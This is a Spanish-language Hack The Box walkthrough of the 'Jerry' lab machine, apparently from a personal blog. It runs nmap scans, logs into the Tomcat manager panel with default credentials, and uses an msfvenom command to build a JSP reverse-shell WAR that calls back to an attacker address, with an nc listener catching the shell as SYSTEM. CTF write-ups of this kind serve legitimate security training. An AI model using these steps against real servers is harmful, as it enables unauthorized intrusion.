lund@home:~$

Autor: Lund K. S.

HTB_Jerry HTB_Jerry | Hacker-Blog

HTB_Jerry

Jerry {-}

Introduccion {-}

La maquina del dia se llama Jerry.

El replay del live se puede ver aqui

S4vitaar Sauna maquina

No olvideis dejar un like al video y un commentario…

Enumeracion {-}

Reconocimiento de maquina, puertos abiertos y servicios {-}

Ping {-}

ping -c 1 10.10.10.95

ttl: 127 -> maquina Windows

Nmap {-}

nmap -p- --open -T5 -v -n 10.10.10.95

Va lento

nmap -sS -p- --open --min-rate 5000 -vvv -n -Pn 10.10.10.95 -oG allPorts 
extractPorts allPorts
nmap -sC -sV -p8080 10.10.10.95 -oN targeted
Puerto Servicio Que se nos occure? Que falta?
8080 http Web Fuzzing  

Analyzando la web {-}

Http Enum {-}

nmap --script http-enub -p8080 10.10.10.95 -oN webScan

Vulnerability Assessment {-}

Checkear la web {-}

Vemos la pagina por defecto de Tomcat. Vamos en la url http://10.10.10.95:8080/manager/html, Intentamos credenciales por defecto:

  • admin:admin
  • tomcat:tomcat
  • tomcat:s3cret

Ya hemos ganado acceso al panel de manager.

Vuln exploit & Gaining Access {-}

War malicioso para tomcat {-}

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -f war -o shell.war

Nos ponemos en escucha por el puerto 443

rlwrap nc -nlvp 443

Subimos el war a la web de manager y ya ganamos accesso a la maquina victima. A demas ya estamos como nt authority\system